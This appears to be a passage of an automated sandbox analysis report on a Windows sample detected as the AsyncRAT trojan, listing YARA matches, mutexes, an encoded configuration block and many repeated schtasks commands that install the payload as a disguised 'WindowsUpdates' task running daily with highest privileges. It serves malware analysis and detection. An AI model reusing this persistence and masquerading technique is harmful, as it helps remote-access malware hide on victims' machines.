            Source: schtasks.exe, 00000004.00000002.1218984003.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000022.00000002.1258049891.00000000030C8000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 0000003A.00000002.1281197103.00000000032F8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://schemas.m
            Source: schtasks.exe, 00000024.00000002.1260760619.0000000002A0B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://schemas.microH
            Source: EGSh5caf8a.exe, 00000000.00000002.1314795117.0000000002891000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.dr; String found in binary or memory: https://sectigo.com/CPS0

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: Yara match; File source: 0.2.EGSh5caf8a.exe.28dc200.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.EGSh5caf8a.exe.28dc200.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: Process Memory Space: EGSh5caf8a.exe PID: 180, type: MEMORYSTR
            Source: schtasks.exe; Process created: 58

            System Summary

            Source: dump.pcap, type: PCAP | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.EGSh5caf8a.exe.28dc200.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
            Source: 0.2.EGSh5caf8a.exe.28dc200.0.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
            Source: 0.2.EGSh5caf8a.exe.28dc200.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
            Source: 0.2.EGSh5caf8a.exe.28dc200.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
            Source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
            Source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
            Source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
            Source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
            Source: Process Memory Space: EGSh5caf8a.exe PID: 180, type: MEMORYSTR | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Code function: 0_2_02794720 0_2_02794720
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Code function: 0_2_02795CB8 0_2_02795CB8
            Source: EGSh5caf8a.exe, 00000000.00000002.1321136441.00000000068E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamehatthgola.dll: vs EGSh5caf8a.exe
            Source: EGSh5caf8a.exe, 00000000.00000002.1313407501.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs EGSh5caf8a.exe
            Source: EGSh5caf8a.exe, 00000000.00000000.1213787103.0000000000472000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameAccounts_LEDGER_Softwares.exeT vs EGSh5caf8a.exe
            Source: EGSh5caf8a.exe, 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameStub.exe" vs EGSh5caf8a.exe
            Source: EGSh5caf8a.exe, 00000000.00000002.1318651208.00000000038F6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAccounts_LEDGER_Softwares.exeT vs EGSh5caf8a.exe
            Source: EGSh5caf8a.exe, 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameStub.exe" vs EGSh5caf8a.exe
            Source: EGSh5caf8a.exe | Binary or memory string: OriginalFilenameAccounts_LEDGER_Softwares.exeT vs EGSh5caf8a.exe
            Source: EGSh5caf8a.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: dump.pcap, type: PCAP | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.EGSh5caf8a.exe.28dc200.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
            Source: 0.2.EGSh5caf8a.exe.28dc200.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
            Source: 0.2.EGSh5caf8a.exe.28dc200.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
            Source: 0.2.EGSh5caf8a.exe.28dc200.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
            Source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
            Source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
            Source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
            Source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
            Source: Process Memory Space: EGSh5caf8a.exe PID: 180, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
            Source: 0.2.EGSh5caf8a.exe.28dc200.0.raw.unpack, Settings.csBase64 encoded string: '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'
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@100/3@0/1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | File created: C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6800:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:432:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2756:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4636:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7016:120:WilError_03
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6356:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1464:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6656:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6216:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6148:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5464:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3092:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5340:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_03
            Source: EGSh5caf8a.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: EGSh5caf8a.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: EGSh5caf8a.exe | ReversingLabs: Detection: 50%
            Source: EGSh5caf8a.exe | Virustotal: Detection: 53%
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | File read: C:\Users\user\Desktop\EGSh5caf8a.exe
            Source: unknown | Process created: C:\Users\user\Desktop\EGSh5caf8a.exe "C:\Users\user\Desktop\EGSh5caf8a.exe"
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:39 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:40 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:41 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:42 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:43 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:43 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:44 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:45 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:46 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:47 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:48 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:48 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:49 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:50 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:51 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:52 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:53 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:53 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:54 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:55 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:56 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
